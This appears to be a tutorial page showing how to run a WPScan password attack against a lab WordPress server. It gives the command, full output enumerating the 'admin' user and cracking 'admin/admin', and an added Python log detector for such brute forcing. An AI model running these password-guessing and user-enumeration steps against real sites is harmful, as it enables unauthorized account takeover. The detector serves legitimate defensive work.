WPScan is a WordPress vulnerability scanner. WPScan is found in the Kali desktop menu 03:Web Application Analysis>Web Vulnerability Scanners.

The following command runs a password attack against a WordPress server (192.168.0.3/wordpress). The --passwords option requires a password file containing the list of passwords to try during the attack.

One of the easiest ways to prepare the password file is to use the Openwall wordlists collection (https://download.openwall.net/). The following command uses a file named "password", downloaded from the /pub/wordlists/passwords directory, as its list of passwords.
kali@kali:~$ wpscan --url 192.168.0.3/wordpress --passwords ./password
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.0.3/wordpress/
[+] Started: Mon Apr 25 00:00:00 20xx
Interesting Finding(s):
[+] http://192.168.0.3/wordpress/
| Interesting Entry: Server: Apache/2.4.38 (Raspbian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.0.3/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://wordpress_ghost_scanner
| - https://wordpress_xmlrpc_dos
| - https://wordpress_xmlrpc_login
| - https://wordpress_pingback_access
[+] http://192.168.0.3/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.0.3/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.0.3/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4 identified (Latest, released on 2020-03-31).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.0.3/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.0.3/wordpress/, Match: 'WordPress 5.4'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -: |=============================================|
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs -: |============================================|
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Wp Login against 1 user/s
Progress: |=================================================
[SUCCESS] - admin / admin
Progress: |===============================================================|
[i] Valid Combinations Found:
| Username: admin, Password: admin
[+] Finished: Mon Apr 25 00:00:00 20xx
[+] Requests Done: 2895
[+] Cached Requests: 5
[+] Data Sent: 1.42 MB
[+] Data Received: 16.047 MB
[+] Memory used: 132.027 MB
[+] Elapsed time: 00:02:43
The log shows that wpscan found the admin/admin account and password pair in 3 minutes.
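Seen from the server, the scan above appears in the Apache access log as a run of author-ID requests followed by a burst of failed POSTs to wp-login.php. The following Python detector is an added example, not part of the original page or of WPScan; the log lines, client addresses, finding names and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
AUTHOR_RE = re.compile(r'[?&]author=\d+')  # author-ID probing, e.g. /?author=1

def detect(lines, window=timedelta(seconds=60), login_min=10, author_min=5):
    """Map client IP -> findings from Apache access-log lines (thresholds are assumptions)."""
    failed, authors = defaultdict(list), defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in access-log format
        ip, raw_ts, method, path, status = m.groups()
        ts = datetime.strptime(raw_ts, '%d/%b/%Y:%H:%M:%S %z')
        # A failed WordPress login re-renders the form (200); a success redirects (302).
        if method == 'POST' and path.split('?')[0].endswith('/wp-login.php') and status == '200':
            failed[ip].append(ts)
        elif method == 'GET' and AUTHOR_RE.search(path):
            authors[ip].add(path)
    findings = defaultdict(set)
    for ip, stamps in failed.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):  # sliding window over failed logins
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= login_min:
                findings[ip].add('wp-login password guessing')
                break
    for ip, paths in authors.items():
        if len(paths) >= author_min:
            findings[ip].add('author ID enumeration')
    return dict(findings)

def sample_log():
    """Constructed sample: one scanning client and one user who mistypes a password twice."""
    t0 = datetime(2020, 4, 25, tzinfo=timezone.utc)
    def row(ip, sec, req, status):
        ts = (t0 + timedelta(seconds=sec)).strftime('%d/%b/%Y:%H:%M:%S %z')
        return f'{ip} - - [{ts}] "{req} HTTP/1.1" {status} 512'
    out = [row('192.168.0.50', i, f'GET /wordpress/?author={i + 1}', 301) for i in range(10)]
    out += [row('192.168.0.50', 20 + i, 'POST /wordpress/wp-login.php', 200) for i in range(30)]
    out += [row('192.168.0.77', 100 + 30 * i, 'POST /wordpress/wp-login.php', 200) for i in range(2)]
    return out

if __name__ == '__main__':
    print(detect(sample_log()))
```

On a real server, pass the lines of the Apache access log to detect() and tune the window and thresholds to the site's normal login traffic.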
Note: wpscan requires internet access to update its database. If the database server is unreachable, wpscan aborts, as in the following output.
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn't connect to server)